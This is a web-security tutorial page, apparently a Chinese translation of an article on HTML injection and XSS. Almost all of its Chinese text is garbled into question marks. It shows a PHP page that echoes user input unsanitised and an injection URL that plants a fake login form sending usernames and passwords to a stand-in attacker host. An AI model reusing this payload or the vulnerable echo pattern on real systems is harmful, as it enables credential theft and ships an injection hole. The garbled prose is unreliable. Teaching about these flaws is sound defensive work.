????????????
???????????? ???????[ 2015/6/3 14:54:25 ] ????????WEB????
???????????????????????????????????????????÷??????????ù???????????????????????????????????????????????????web???????????????佨???????ι????????????????????????????????????????
????OWASP???????????????????????????????????????????????????????????????????????????????????????????????????????Щ????£?????????????????????????????????????????????????????е????
????Web??ó?????????????????????????????1??????????web??ó???????????????????Σ????????????????綯?HTML????????д????????????????α??????????????cookies????????????
?????????????XSS???????
??????OWASP??????????XSS???????????????XSS??????<script>????????????????JS???????????????????????????????????XSS???????????????????????????????????????????2???????????????
????????????????????
??????????????????
???????????????????????????????????
????????????????URL????URL??????????????????????????Щ?????
??????????????ε?????????????????????з????
?????????????????????????HTML?????????????????????????
??????????????????????????????????????
?????????PHP???????HTML????????
????Form.html
????</pre>
????<h1> INFOSEC INSTITUTE</h1>
????<form action=”get”>
????<b>Enter your name: </b>
????<input type=”text” name=”name” />
????<input type=”submit” value=”submit name” />
????</form>
????<pre>
???????Ч???????
????Name.php
????<!–?php $name = $_REQUEST ['name']; ?–></pre>
????<h1>Welcome to Infosec Institute</h1>
????<pre>
????Hello?? <!–?php echo $name; ?–>!
????How can we help you ?
???????Ч???????
??????????get???????? name??namp.php????????????????????????????????URL??
????ocalhost/name.php?name=Bhavesh<form action=”http://attackers/log.php” method=”post”>Username<input type=”text” name=”user”><br>password<input type=”password” name=”pass”><input type=”submit”></form>
??????????????????????????????HTML?????????????????????????????????????????????????????????????log.php.
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11